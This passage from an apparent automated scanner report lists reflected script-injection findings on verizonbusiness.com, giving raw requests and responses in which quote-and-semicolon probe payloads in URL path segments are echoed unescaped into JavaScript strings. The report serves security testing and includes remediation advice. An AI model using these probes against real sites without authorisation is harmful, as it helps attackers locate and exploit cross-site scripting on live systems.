Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nof2ab8";ba895b94910/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.536. http://www.verizonbusiness.com/no/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /no/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79142'%3b216be360872 was submitted in the REST URL parameter 1. This input was echoed as 79142';216be360872 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /no79142'%3b216be360872/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/no79142';216be360872/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.537. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nz/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a399f'%3b4c3c9fce10b was submitted in the REST URL parameter 1. This input was echoed as a399f';4c3c9fce10b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nza399f'%3b4c3c9fce10b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nza399f';4c3c9fce10b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.538. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nz/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70895"%3b894c67a9f8d was submitted in the REST URL parameter 1. This input was echoed as 70895";894c67a9f8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nz70895"%3b894c67a9f8d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nz70895";894c67a9f8d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.539. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7e84'%3b5f0a33a9f52 was submitted in the REST URL parameter 1. This input was echoed as b7e84';5f0a33a9f52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pab7e84'%3b5f0a33a9f52/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/pab7e84';5f0a33a9f52/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.540. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73add"%3b61b1cc65595 was submitted in the REST URL parameter 1. This input was echoed as 73add";61b1cc65595 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pa73add"%3b61b1cc65595/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:40 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/pa73add";61b1cc65595/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.541. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f930"%3b4b2bf218c2 was submitted in the REST URL parameter 1. This input was echoed as 9f930";4b2bf218c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy9f930"%3b4b2bf218c2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/privacy9f930";4b2bf218c2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.542. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2da'%3bb6f82da7486 was submitted in the REST URL parameter 1. This input was echoed as dd2da';b6f82da7486 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacydd2da'%3bb6f82da7486/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/privacydd2da';b6f82da7486/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.543. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcd22'%3bee1b93201b8 was submitted in the REST URL parameter 1. This input was echoed as fcd22';ee1b93201b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productsfcd22'%3bee1b93201b8/itsolutions/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:14 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsfcd22';ee1b93201b8/itsolutions/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.544. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23de6"%3bf40f6bc460e was submitted in the REST URL parameter 1. This input was echoed as 23de6";f40f6bc460e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products23de6"%3bf40f6bc460e/itsolutions/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products23de6";f40f6bc460e/itsolutions/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.545. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5960"%3b6a6a7da42f5 was submitted in the REST URL parameter 2. This input was echoed as f5960";6a6a7da42f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutionsf5960"%3b6a6a7da42f5/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itf5960";6a6a7da42f5/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.546. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d72'%3ba0b4682ef0a was submitted in the REST URL parameter 2. This input was echoed as b9d72';a0b4682ef0a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutionsb9d72'%3ba0b4682ef0a/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/itb9d72';a0b4682ef0a/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.547. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be953'%3bfef5b8b9d7e was submitted in the REST URL parameter 3. This input was echoed as be953';fef5b8b9d7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutions/caasbe953'%3bfef5b8b9d7e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43385
Date: Wed, 17 Nov 2010 00:40:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caasbe953';fef5b8b9d7e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.548. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471a3"%3baa7257f4871 was submitted in the REST URL parameter 3. This input was echoed as 471a3";aa7257f4871 in the application's response.

